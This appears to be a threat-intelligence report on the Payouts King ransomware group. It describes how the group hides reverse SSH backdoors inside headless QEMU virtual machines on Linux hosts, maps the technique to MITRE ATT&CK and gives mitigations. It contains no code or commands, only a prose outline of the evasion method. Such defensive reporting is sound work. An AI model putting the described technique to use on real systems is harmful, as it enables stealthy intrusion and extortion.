Payouts King Ransomware Deploys QEMU VMs as Stealthy Reverse SSH Backdoors

Executive Summary

The Payouts King ransomware operation has adopted a novel defense evasion technique, using the open-source QEMU hardware emulator to create hidden virtual machines on compromised Linux systems. According to analysis by cybersecurity firm Halcyon, the threat actors deploy these VMs to establish a persistent, encrypted reverse SSH backdoor, allowing them to maintain access and execute ransomware payloads from within a virtualized environment that is largely invisible to host-based security tools. This method represents a significant escalation in adversary tradecraft, moving beyond traditional living-off-the-land binaries (LOLBins) to abuse legitimate system virtualization software for stealth.

Technical Analysis

The attack chain begins with the threat actors gaining initial access, typically via compromised credentials or exploiting vulnerabilities in internet-facing services. Once on a target Linux host, they download and execute a shell script that installs QEMU and related dependencies if not present. The core evasion technique involves creating a minimal, custom-built QEMU virtual machine image—a 34MB Alpine Linux filesystem—hosted on the attacker's infrastructure.

The attackers then configure QEMU to run this VM in a headless mode (without a graphical interface) and set up port forwarding. Crucially, they configure the VM's SSH server to connect back to an attacker-controlled command-and-control (C2) server, establishing a reverse SSH tunnel. This tunnel provides the attackers with encrypted, outbound-only command execution capability from within the VM. Because the malicious activity is contained within the virtualized QEMU process, which appears as a legitimate system service, host-based endpoint detection and response (EDR) solutions struggle to inspect the network traffic and processes running inside the VM. The ransomware payload itself is subsequently executed from within this isolated, stealthy environment.

Tactics, Techniques & Procedures

Based on the Halcyon report, the observed TTPs map to the following MITRE ATT&CK framework techniques:

• T1562.001 (Impair Defenses: Disable or Modify Tools): Abusing QEMU's virtualization to create an environment isolated from host security monitoring.
• T1573.002 (Encrypted Channel: Asymmetric Cryptography): Using SSH for encrypted command and control.
• T1095 (Non-Application Layer Protocol): Using SSH (a non-standard C2 protocol for many ransomware operations) for communication.
• T1027 (Obfuscated Files or Information): Executing the final ransomware payload from within the obfuscated context of a VM.
• T1059.004 (Command and Scripting Interpreter: Unix Shell): Use of bash scripts for deployment and execution.
• T1210 (Exploitation of Remote Services): Presumed initial access vector to deploy the QEMU mechanism.

Threat Actor Context

The group behind Payouts King ransomware emerged in early 2026. Halcyon analysts assess that Payouts King is a distinct operation, not a direct rebrand of the known Black Basta ransomware group, though it may share some ideological or tactical lineage. The use of QEMU for stealth is a notable evolution in its operational security. The ransomware itself is written in Golang and employs a double-extortion model, stealing data before encryption and threatening to publish it on a dedicated leak site. The primary targets identified so far are organizations in the manufacturing and technology sectors, but the technique is portable to any environment running Linux systems with sufficient resources to host a QEMU VM.

Mitigations & Recommendations

Organizations should implement a layered defense strategy to counter this novel evasion technique. Network-level detection is critical: monitor for outbound SSH connections from non-standard or unexpected internal hosts, especially to unknown external IP addresses. On the host, implement strict application allow-listing to prevent the unauthorized installation or execution of virtualization software like QEMU on standard workstations and servers. Use behavioral analytics to flag processes that spawn network listeners or establish outbound tunnels. Ensure robust credential hygiene and patch internet-facing systems to block the initial access vectors Payouts King likely exploits. Finally, segment networks to limit lateral movement, reducing the impact if a single host is compromised and used to launch hidden VMs.